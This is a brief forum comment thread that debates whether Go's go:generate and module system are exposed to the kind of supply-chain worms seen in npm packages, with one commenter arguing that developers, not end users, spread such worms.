| ▲ | yegle an hour ago | |
`go:generate` is for the package provider, the command never runs when someone `go install` or `go get` the package. | ||
| ▲ | cookiengineer an hour ago | parent [-] | |
Note that the NPM worms are spreading because the package providers are developing on their libraries without them noticing a malicious dependency. It is not users/consumers spreading the worm, it is developers spreading it. Your mismatch is that you think in policies, not assessments here. Nothing in my normal go workflow will ask me if I want to run "curl download whatever from the internet" when I run go build. Though I agree with the difference in workflow, there is not a single mechanism in go catching this. go.mod files can be just patched by the worm, and/or hidden behind a /v123 folder or whatever to play shenanigans on API differences. | ||